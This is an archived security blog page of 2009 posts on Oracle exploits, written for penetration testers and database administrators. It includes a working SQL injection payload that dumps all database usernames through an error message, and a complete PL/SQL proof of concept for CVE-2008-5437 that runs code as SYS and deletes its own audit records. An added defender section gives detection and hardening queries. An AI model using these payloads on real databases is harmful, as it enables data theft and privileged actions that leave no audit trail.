Archive for the ‘Exploit’ Category

Metasploit contains new Oracle exploits

Monday, March 2nd, 2009

Chris Gates wrote on his blog that Metasploit now contains exploits for Oracle bugs which were fixed in the October 2008 (lt.compress) and January 2009 CPUs.

Metasploit is becoming more and more useful for Oracle pentesters…

New SQL Injection Whitepaper (for SQL Server)

Sunday, February 8th, 2009

Daniel Kachakil released an interesting whitepaper about fast data extraction using SQL Injection and XML statements on SQL Server, together with a tool implementing this technique called SFX-SQLI.

The paper describes how to retrieve data from a SQL Server database using SQL Injection and XML. This technique is not new (for me). I have been using such techniques in the Oracle environment via xmltransform or stragg for a while. It is possible to retrieve the entire content of a table in a single error message…

More details will be available in the SQL Injection book I am currently writing with some other security researchers…

The tool SFX-SQLI implements the concept for SQL Server.

Here is one of the examples of how to export an entire table, e.g. via utl_inaddr. The output is limited to 4000 bytes:

or 1= utl_inaddr.get_host_name((select xmltransform(sys_xmlagg(sys_xmlgen(username)),xmltype('<?xml version="1.0"?> ;
')).getstringval() listagg from all_users))--

Warning: ociexecute(): OCIStmtExecute: ORA-29257: host CUSTCOM_PROD;WEBTOOL;WEBDB;NELLDB;ERDB;B2B;BI;PM;SH;IX;OE;HR;SCOTT;MGMT_VIEW;MDDATA;SYSMAN;MDSYS;SI_INFORMTN_SCHEMA;ORDPLUGINS;ORDSYS;OLAPSYS;ANONYMOUS;XDB;CTXSYS;EXFSYS;WMSYS;DBSNMP;TSMSYS;DIP;OUTLN;SYSTEM;SYS; unknown ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512: at "SYS.UTL_INADDR", line 35

Attacking Oracle with Metasploit Video published

Saturday, February 7th, 2009

Chris Gates has published a video from the Shmoocon 09 conference in which he shows how to attack Oracle with Metasploit.

Even though the attacks were shown on an outdated version of Oracle (10.1.0.3), it’s good to see that the Oracle support in Metasploit is getting better…

Chris has an interesting blog called carnal0wnage.blogspot.com.

Proof-of-concept how to bypass Oracle Auditing using DBMS_IJOB

Friday, January 16th, 2009

Here is the proof of concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA and my former colleague from Oracle Consulting Germany.

A different bug concerning Auditing reported by us is still open. Oracle Auditing alone is not sufficient because there are various ways to bypass it. Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.

-- Bypassing Oracle Auditing
-- Everything executed via dbms_ijob (granted to DBAs by default)
-- will not appear in the Oracle auditing
-- by Volker Solinus

declare
  jj    integer := 666666;    -- job number
begin
  sys.dbms_ijob.submit(
    JOB       => jj,
    LUSER     => 'SYS',
    PUSER     => 'SYS',
    CUSER     => 'SYS',
    NEXT_DATE => sysdate,
    INTERVAL  => null,
    BROKEN    => false,
    WHAT      => '
declare
  jj    integer := '||jj||';
begin
  execute immediate ''alter system archive log current'';
  sys.dbms_ijob.remove(jj);
  delete from sys.aud$ where obj$name = ''DBMS_IJOB'';
  commit;
end;',
    NLSENV    => 'NLS_LANGUAGE=''AMERICAN'' NLS_TERRITORY=''AMERICA'' NLS_CURRENCY=''$'' NLS_ISO_CURRENCY=''AMERICA'' NLS_NUMERIC_CHARACTERS=''.,'' NLS_DATE_FORMAT=''DD-MON-RR'' NLS_DATE_LANGUAGE=''AMERICAN'' NLS_SORT=''BINARY''',
    ENV       => hextoraw('0102000200000000'));
  sys.dbms_ijob.run(jj);
exception when others then
  if sqlcode = -12011 then
    sys.dbms_ijob.remove(jj);
  end if;
  raise;
end;
/

After applying the January 2009 CPU you will get the following error message:

ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32
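
As an added defender-side example (not part of the original post or of Volker's PoC), a few statements a DBA can use to see who can reach DBMS_IJOB, to spot pending jobs of the kind the PoC submits, and to move the audit trail out of reach of the DELETE FROM sys.aud$ in the job body. It assumes standard Oracle 10g/11g dictionary views and init parameters; the DBMS_IJOB grant to the DBA role is the default the post mentions.

```sql
-- Added example: checks for the DBMS_IJOB audit bypass described above.
-- Run as a DBA (or SYS for the ALTER SYSTEM statements).

-- 1. Who holds EXECUTE on SYS.DBMS_IJOB directly, and which users
--    receive it through a role (by default the DBA role carries it).
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_IJOB';

SELECT grantee, granted_role
  FROM dba_role_privs
 WHERE granted_role IN (SELECT grantee
                          FROM dba_tab_privs
                         WHERE owner = 'SYS'
                           AND table_name = 'DBMS_IJOB')
 ORDER BY grantee;

-- 2. Pending jobs that look like the PoC: submitted as SYS from another
--    account (log_user <> priv_user), or a body that touches DBMS_IJOB
--    or the audit table. The PoC removes its own job, so this only
--    catches jobs that have not run yet or failed to remove themselves.
SELECT job, log_user, priv_user, schema_user, next_date, what
  FROM dba_jobs
 WHERE priv_user <> log_user
    OR priv_user = 'SYS'
    OR UPPER(what) LIKE '%AUD$%'
    OR UPPER(what) LIKE '%DBMS_IJOB%';

-- 3. Record every call to the package; the PoC's DELETE on sys.aud$
--    is there precisely to remove these rows, so review the trail
--    for DBAs that hold the grant but never appear in it.
AUDIT EXECUTE ON sys.dbms_ijob BY ACCESS;

SELECT username, obj_name, action_name, timestamp
  FROM dba_audit_trail
 WHERE obj_name = 'DBMS_IJOB'
 ORDER BY timestamp DESC;

-- 4. The job runs as SYS, and SYS activity is not written to aud$ by
--    standard auditing. audit_sys_operations=TRUE sends SYS actions to
--    the OS audit file, and audit_trail=OS keeps the whole trail outside
--    the database, where a DELETE FROM sys.aud$ cannot reach it.
--    Both parameters are static: a restart is required.
ALTER SYSTEM SET audit_sys_operations = TRUE SCOPE = SPFILE;
ALTER SYSTEM SET audit_trail = OS SCOPE = SPFILE;
```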

First exploits (non-DB) for January 2009 CPU

Thursday, January 15th, 2009

Joxean Koret has published the first exploit for remote code execution on Oracle Secure Backup 10g. Having the name "Secure" in the title is probably not always the smartest idea…

Joxean has also published an additional exploit for Oracle TimesTen.